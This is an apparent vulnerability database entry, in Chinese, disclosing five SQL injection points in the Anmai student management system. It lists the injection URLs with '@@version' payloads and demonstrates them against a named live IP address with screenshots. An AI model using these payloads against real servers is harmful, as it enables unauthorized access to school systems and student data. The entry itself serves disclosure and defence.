安脉学生综合管理系统5处SQL注入漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 安脉学生综合管理系统5处SQL注入漏洞 ### 详细说明: 5处利用payload分别如下 ``` /OA/document/DocCheckView.aspx?id=1 and @@version=1 /OA/news/viewAffiche.aspx?id=1 and @@version=1 /Asset/Device/Admin_Photo.aspx?Action=Modify&HouseID=1' and @@version=1-- /Asset/Device/DeviceCancelInfo_View.aspx?DeviceCancelID=1' and @@version=1-- /Asset/Device/DeviceInputSearch.aspx?hidsearch=search&assetfactory=1' and @@version=1-- ``` ### 漏洞证明: 以 http://218.22.96.74:8899/ 为例 http://218.22.96.74:8899/OA/document/DocCheckView.aspx?id=1 and @@version=1 [<img src="https://images.seebug.org/upload/201504/10124245fb54497ec7d26eee03a991ed89282036.jpg" alt="QQ截图20150410124534.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/10124245fb54497ec7d26eee03a991ed89282036.jpg) http://218.22.96.74:8899/OA/news/viewAffiche.aspx?id=1 and @@version=1 [<img src="https://images.seebug.org/upload/201504/101243042300dd0d44cd26c0ca0fbbdeccf35ebd.jpg" alt="QQ截图20150410124644.jpg" width="600"...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息